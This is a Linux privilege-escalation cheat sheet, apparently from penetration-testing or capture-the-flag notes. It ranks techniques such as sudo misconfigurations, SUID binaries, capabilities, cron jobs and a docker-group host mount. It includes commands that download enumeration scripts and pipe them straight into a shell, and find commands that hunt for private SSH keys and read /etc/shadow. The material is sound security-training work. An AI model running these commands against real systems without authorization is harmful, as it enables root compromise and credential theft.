Linux Privilege Escalation
#Overview
Linux privilege escalation is the process of elevating from a low-privilege user (www-data, apache, nobody, service accounts) to root. Linux privesc follows a structured methodology: automated enumeration for low-hanging fruit, then manual deep-dive into specific techniques. The kernel, file permissions, scheduled tasks, and service misconfigurations are the primary attack surfaces.
#Priority Order
| Priority | Technique | Key Command | Effort | Success Rate |
|---|---|---|---|---|
| 1 | sudo -l | sudo -l | Minimal | High |
| 2 | SUID binaries | find / -perm -4000 -type f 2>/dev/null | Low | High |
| 3 | Capabilities | getcap -r / 2>/dev/null | Low | Medium |
| 4 | Cron jobs | Check /etc/crontab, pspy | Medium | Medium |
| 5 | Writable systemd services | find /etc/systemd -writable | Medium | Medium |
| 6 | Docker group | id then docker run -v /:/host -it alpine chroot /host | Low | High |
| 7 | Writable /etc/passwd | Check permissions on /etc/passwd | Low | High |
| 8 | Password/key hunting | find / -name id_rsa, grep configs | Medium | Medium |
| 9 | NFS no_root_squash | showmount -e, mount + SUID | Medium | Medium |
| 10 | Library hijacking | LD_PRELOAD, ld.so.preload, RPATH | Medium | Medium |
| 11 | Symlink/race conditions | Writable dirs + root-owned write ops | High | Low-Medium |
| 12 | Kernel exploits | uname -a, exploit suggester | High | Medium |
#Automated Enumeration First
Always start with automated tools before manual hunting:
# linpeas (most comprehensive)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Alternative: LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh
# pspy (watch processes without root)
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 && chmod +x pspy64 && ./pspy64
BASH
#Manual Verification Priority
After automated enumeration, verify these in order:
# 1. Sudo
sudo -l 2>/dev/null
# 2. SUID
find / -perm -4000 -type f 2>/dev/null
# 3. Capabilities
getcap -r / 2>/dev/null
# 4. Cron
cat /etc/crontab 2>/dev/null
ls -la /etc/cron.* 2>/dev/null
# 5. Writable files owned by root in PATH directories
find / -writable -user root -type f 2>/dev/null | grep -v proc
# 6. Docker
id | grep docker
# 7. /etc/passwd writable
ls -la /etc/passwd /etc/shadow
# 8. SSH keys
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
# 9. Kernel
uname -a
cat /etc/os-release
BASH
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| linpeas | https://github.com/carlospolop/PEASS-ng |
| LinEnum | https://github.com/rebootuser/LinEnum |
| pspy | https://github.com/DominicBreuker/pspy |
| GTFOBins | https://gtfobins.github.io/ |
| linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester |
#Source Machines
- Help (Easy, Linux) - Kernel exploit (4.4.0-116-generic)
- Intentions (Hard, Linux) - Capability abuse (CAP_DAC_READ_SEARCH)
- Sau (Easy, Linux) - Sudo misconfiguration (systemctl status + pager escape)
- Monitored (Medium, Linux) - Sudo + symlink attack on getprofile.sh
- Soccer (Easy, Linux) - doas + dstat plugin execution
- Cerberus (Hard, Linux) - Firejail SUID CVE-2022-31214 container breakout